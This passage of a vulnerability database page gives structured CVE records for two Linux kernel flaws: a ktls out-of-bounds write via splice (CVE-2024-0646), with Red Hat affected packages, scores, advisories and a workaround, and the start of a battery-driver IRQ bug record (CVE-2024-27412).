"url": "https://access.redhat.com/security/cve/CVE-2024-0646"
},
{
"name": "RHBZ#2253908",
"tags": [
"issue-tracking",
"x_refsource_REDHAT",
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253908"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-0646",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-10T04:00:15.716357Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-06-17T21:19:19.245Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://git.kernel.org/pub/scm/linux/kernel",
"defaultStatus": "unaffected",
"packageName": "kernel",
"versions": [
{
"lessThan": "6.7-rc5",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::realtime",
"cpe:/a:redhat:enterprise_linux:8::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.18.1.rt7.320.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::crb",
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-513.18.1.el8_9",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.2::baseos",
"cpe:/o:redhat:rhel_e4s:8.2::baseos",
"cpe:/o:redhat:rhel_aus:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Advanced Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.128.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_tus:8.2::realtime",
"cpe:/a:redhat:rhel_tus:8.2::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.128.1.rt13.179.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.2::baseos",
"cpe:/o:redhat:rhel_e4s:8.2::baseos",
"cpe:/o:redhat:rhel_aus:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.128.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_tus:8.2::baseos",
"cpe:/o:redhat:rhel_e4s:8.2::baseos",
"cpe:/o:redhat:rhel_aus:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.128.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.2::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.4::baseos",
"cpe:/o:redhat:rhel_tus:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_tus:8.4::realtime",
"cpe:/a:redhat:rhel_tus:8.4::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.rt7.201.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.4::baseos",
"cpe:/o:redhat:rhel_tus:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.4::baseos",
"cpe:/o:redhat:rhel_tus:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.125.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.4::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/a:redhat:rhel_eus:8.6::crb",
"cpe:/o:redhat:rhel_eus:8.6::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.6 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.91.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.6::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8.6 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.8::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8.8 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.8::baseos",
"cpe:/a:redhat:rhel_eus:8.8::crb"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.8 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-477.51.1.el8_8",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/o:redhat:enterprise_linux:9::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-362.24.1.el9_3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/o:redhat:enterprise_linux:9::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-362.24.1.el9_3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:9.0::baseos",
"cpe:/a:redhat:rhel_eus:9.0::crb",
"cpe:/a:redhat:rhel_eus:9.0::appstream"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-70.93.2.el9_0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.0::realtime",
"cpe:/a:redhat:rhel_eus:9.0::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-70.93.1.rt21.165.el9_0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:9.0::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::appstream",
"cpe:/a:redhat:rhel_eus:9.2::crb",
"cpe:/o:redhat:rhel_eus:9.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.52.1.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::nfv",
"cpe:/a:redhat:rhel_eus:9.2::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.52.1.rt14.337.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:9.2::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhev_hypervisor:4.4::el8",
"cpe:/a:redhat:rhel_eus:8.6::crb",
"cpe:/o:redhat:rhel_eus:8.6::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.91.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-22",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/cluster-logging-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-11",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch6-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v6.8.1-407",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-19",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-proxy-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.0.0-479",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/elasticsearch-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-7",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/eventrouter-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.4.0-247",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/fluentd-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-5",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/log-file-metric-exporter-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v1.1.0-227",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-curator5-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.1-470",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-loki-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v2.9.6-14",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/logging-view-plugin-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-operator-bundle",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-24",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/loki-rhel9-operator",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v5.8.6-10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/lokistack-gateway-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-525",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/opa-openshift-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.1.0-224",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://catalog.redhat.com/software/containers/",
"cpes": [
"cpe:/a:redhat:logging:5.8::el9"
],
"defaultStatus": "affected",
"packageName": "openshift-logging/vector-rhel9",
"product": "RHOL-5.8-RHEL-9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "v0.28.1-56",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"datePublic": "2023-12-07T06:30:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "An out-of-bounds memory write flaw was found in the Linux kernel\u2019s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-06T20:51:54.670Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:0723",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0723"
},
{
"name": "RHSA-2024:0724",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0724"
},
{
"name": "RHSA-2024:0725",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0725"
},
{
"name": "RHSA-2024:0850",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0850"
},
{
"name": "RHSA-2024:0851",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0851"
},
{
"name": "RHSA-2024:0876",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0876"
},
{
"name": "RHSA-2024:0881",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0881"
},
{
"name": "RHSA-2024:0897",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0897"
},
{
"name": "RHSA-2024:1248",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1248"
},
{
"name": "RHSA-2024:1250",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1250"
},
{
"name": "RHSA-2024:1251",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1251"
},
{
"name": "RHSA-2024:1253",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1253"
},
{
"name": "RHSA-2024:1268",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1268"
},
{
"name": "RHSA-2024:1269",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"name": "RHSA-2024:1278",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1278"
},
{
"name": "RHSA-2024:1306",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1306"
},
{
"name": "RHSA-2024:1367",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1367"
},
{
"name": "RHSA-2024:1368",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1368"
},
{
"name": "RHSA-2024:1377",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1377"
},
{
"name": "RHSA-2024:1382",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1382"
},
{
"name": "RHSA-2024:1404",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1404"
},
{
"name": "RHSA-2024:2094",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:2094"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-0646"
},
{
"name": "RHBZ#2253908",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253908"
},
{
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c5a595000e267"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-01-17T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2023-12-07T06:30:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination",
"workarounds": [
{
"lang": "en",
"value": "To mitigate this issue, prevent module tls from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically."
}
],
"x_redhatCweChain": "CWE-787: Out-of-bounds Write"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2024-0646",
"datePublished": "2024-01-17T15:16:45.148Z",
"dateReserved": "2024-01-17T13:11:12.669Z",
"dateUpdated": "2025-11-06T20:51:54.670Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-27412 (GCVE-0-2024-27412)
Vulnerability from cvelistv5
Published
2024-05-17 11:50
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
power: supply: bq27xxx-i2c: Do not free non existing IRQ
The bq27xxx i2c-client may not have an IRQ, in which case
client->irq will be 0. bq27xxx_battery_i2c_probe() already has
an if (client->irq) check wrapping the request_threaded_irq().
But bq27xxx_battery_i2c_remove() unconditionally calls
free_irq(client->irq) leading to:
[ 190.310742] ------------[ cut here ]------------
[ 190.310843] Trying to free already-free IRQ 0
[ 190.310861] WARNING: CPU: 2 PID: 1304 at kernel/irq/manage.c:1893 free_irq+0x1b8/0x310
Followed by a backtrace when unbinding the driver. Add
an if (client->irq) to bq27xxx_battery_i2c_remove() mirroring
probe() to fix this.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 76d2ed844def0cb8704d766924b07b2a918b3e30 Version: dafe9136be7b7fc30f1f3ca410c15b7cc65bee44 Version: 1da9a4b55a6688e3a30c16d0cf2e7c6a90a684fb Version: e01820a94aea99296e500f54b3f36a2985061045 Version: e65fee45687fa2109e03056a696dc7d68a151296 Version: 444ff00734f3878cd54ddd1ed5e2e6dbea9326d5 Version: 444ff00734f3878cd54ddd1ed5e2e6dbea9326d5 Version: 444ff00734f3878cd54ddd1ed5e2e6dbea9326d5 Version: ca4a2ddd2e69ca82ca5992d4c49649b2cbac3b74 Version: 28960625adaaf3fa3d83c8d3596661d2576d0a83 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-27412",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-31T18:37:48.619858Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
